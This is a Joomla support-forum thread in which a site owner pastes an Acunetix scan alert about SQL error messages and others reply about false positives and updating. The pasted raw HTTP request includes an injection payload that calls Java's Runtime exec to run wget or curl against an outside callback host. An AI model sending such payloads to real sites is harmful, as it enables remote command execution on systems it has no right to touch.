3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Discussion regarding Joomla! 3.x security issues.

Moderators: Bernard T, mandville, PhilD, fcoulter, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Post Reply
fc338339
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Tue Jul 19, 2016 10:27 pm

3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by fc338339 » Wed Sep 26, 2018 12:34 pm

Dear Sirs,

When I updated my website, and scanned by Acunetix, I got 740 medium severity as below reports! How can we fix this problem

Thanks

// ===== Acunetix reports ==== //

Alert group Application error message
Severity Medium
Description
This alert requires manual confirmation
Application error or warning messages may expose sensitive information about an application's
internal workings to an attacker.
Acunetix found an error or warning message that may disclose sensitive information. The
message may also contain the location of the file that produced an unhandled exception. Consult
the 'Attack details' section for more information about the affected page.
Recommendations
Verify that this page is disclosing error or warning messages and properly configure the
application to log errors to a file instead of displaying the error to the user.
Alert variants
Details
URL encoded POST input filter_order_Dir was set to 1
Pattern found:
You have an error in your SQL syntax
POST /index.php/cn/servicecategory/%E5%A1%91%E6%96%99%E6%80%A7%E8%83%BD%E6%B5%8B%E8%AF%95.feed
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www.labtestone.org/
Connection: keep-alive
Cookie:
d6623af456feb47dbdcf2396224b7b70=qpc3shevudnoiv8g1afd1a2l07;612204977e0fbae5e9cf27e947f61573
=svckf7vq4l02a4qr99avqii953; 612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953;
lca8320_0=0; 612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=svckf7vq4l02a4qr99avqii953; lca8320_0=0;
612204977e0fbae5e9cf27e947f61573=6fv7j8nst1sib9n6f22jjdnpl5; lca8320_0=0
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 192
Host: www.labtestone.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
filter_order=1&filter_order_Dir[#this.getClass().forName('java.lang.Runtime').getRuntime().e
xec('wget+http://hitipzQwMaGB5.bxss.me/||curl+htt ... 5.bxss.me/')]=1&limitstart=
1&task=1

User avatar
toivo
Joomla! Master
Joomla! Master
Posts: 10615
Joined: Thu Feb 15, 2007 5:48 am
Location: Oxford, UK
Contact:

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by toivo » Wed Sep 26, 2018 12:46 pm

Your site produces the following message:
403: Access Forbidden
Your location (GB) has been blacklisted.
Toivo Talikka, Global Moderator
troubleshooting smtp and other articles https://talikka.com/joomla

User avatar
CyrusXxX
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 169
Joined: Wed Oct 04, 2017 6:23 am
Location: Belgrade Serbia
Contact:

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by CyrusXxX » Wed Sep 26, 2018 1:28 pm

Description
This alert requires manual confirmation
Application error or warning messages may expose sensitive information about an application's
internal workings to an attacker.
Acunetix found an error or warning message that may disclose sensitive information. The
message may also contain the location of the file that produced an unhandled exception. Consult
the 'Attack details' section for more information about the affected page.
Recommendations
Verify that this page is disclosing error or warning messages and properly configure the
application to log errors to a file instead of displaying the error to the user.
As instructed visit those pages and check if they give you msgs or errors. False positives can happen.

fc338339
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Tue Jul 19, 2016 10:27 pm

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by fc338339 » Thu Sep 27, 2018 8:05 am

Dear Sirs,

How to avoid this "false positives" .
Thanks

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14765
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by mandville » Thu Sep 27, 2018 8:12 am

fc338339 wrote:
Thu Sep 27, 2018 8:05 am
Dear Sirs,

How to avoid this "false positives" .
Thanks
Options
1. Update joomla and rescan
2. Don't use a 3rd party scanner.
3. Ask acunetix what their results mean or read the instructions first.
E.g. would you ring persil when your washing machine started beeping or would you read the manual first.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
CyrusXxX
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 169
Joined: Wed Oct 04, 2017 6:23 am
Location: Belgrade Serbia
Contact:

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by CyrusXxX » Sun Sep 30, 2018 10:17 pm

When websites are in questions all automated scans will produce false positive and currently there is no way of avoiding them.

When you receive warnings like that you need to confirm them and separate false from real threats.

I need to point out that many devs in their extensions use coding which sometimes triggers automated scanners.
If you are skilled enough you will be able to figure out what are false positive or what is real security issue.


Post Reply

Return to “Security in Joomla! 3.x”